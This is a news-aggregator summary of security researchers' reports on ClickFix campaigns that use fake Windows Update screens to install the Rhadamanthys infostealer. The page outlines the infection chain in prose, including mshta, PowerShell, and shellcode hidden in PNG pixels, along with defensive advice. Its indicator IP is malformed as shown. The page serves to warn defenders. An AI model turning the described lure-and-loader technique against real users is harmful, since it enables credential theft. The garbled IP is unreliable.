US EditionDo Not Download These Windows Security Updates, Experts Warn
From Sept 29 to Oct 30, 76 incidents involved Rhadamanthys infostealer delivered via fake update screens using steganographic loaders, Huntress analysts reported.
- As of November 19, Huntress security analysts Ben Folland and Anna Pham reported a fresh wave of ClickFix attacks using fake Windows Update screens to load Rhadamanthys infostealer across the United States, EMEA and APJ, with multiple active Windows Update lure domains still hosting the campaign.
- Earlier this month, researchers noted the ClickFix technique shifted from robot-check lures to fake Windows Update prompts, with Huntress analyzing activity before and after the November 13 takedowns.
- The attack chain begins with an mshta.exe command using a URL with a hex-encoded second octet, running PowerShell that loads a.NET assembly and a steganographic loader extracting Donut-packed shellcode from PNG pixel data to evade signature-based detection.
- Huntress recommended blocking the Windows Run box, training victims that real updates never require pasted commands, using endpoint detection and response tools to monitor suspicious processes, and watching traffic from IP 141.98.80175 as Microsoft said ClickFix is now the most common initial access method.
- Amid uncertain attribution, Huntress notes comments in Russian on lure site and hex‑encoded URL structure linked to Rhadamanthys; these techniques surged over the past year among government‑sponsored spies and cybercriminal gangs.
15 Articles
15 Articles
New ClickFix attacks use fake Windows Update screens to fool employees
CSOs and Windows admins should disable the ability of personal computers to automatically run commands to block the latest version of the ClickFix social engineering attacks. This advice comes from researchers at Huntress, who this week warned that a new version of ClickFix-based attacks, where employees are tricked into running malicious commands, is circulating. The latest tactics of this campaign include steganography — hiding malware in the …
ClickFix Returns: Stealthy Malware Hidden in PNGs Targets Windows Users
New variants use full-screen browser lures, steganography, and shellcode loaders to drop LummaC2 and Rhadamanthys malware A New… The post ClickFix Returns: Stealthy Malware Hidden in PNGs Targets Windows Users appeared first on IMP.NEWS.
Fraudsters are trying clever, sophisticated methods to get hold of your data: right now, they are sending a dangerous code to your computer, in a way that you can unsuspectingly consent to.
While Windows runs the patch in turn, a malicious campaign exploits the ambient confusion to display a fake system update installation screen and encourage users to validate a trapped command themselves. At the key, a beautiful infection signed Rhadamanthys.
Coverage Details
Bias Distribution
- 100% of the sources are Center
Factuality
To view factuality data please Upgrade to Premium
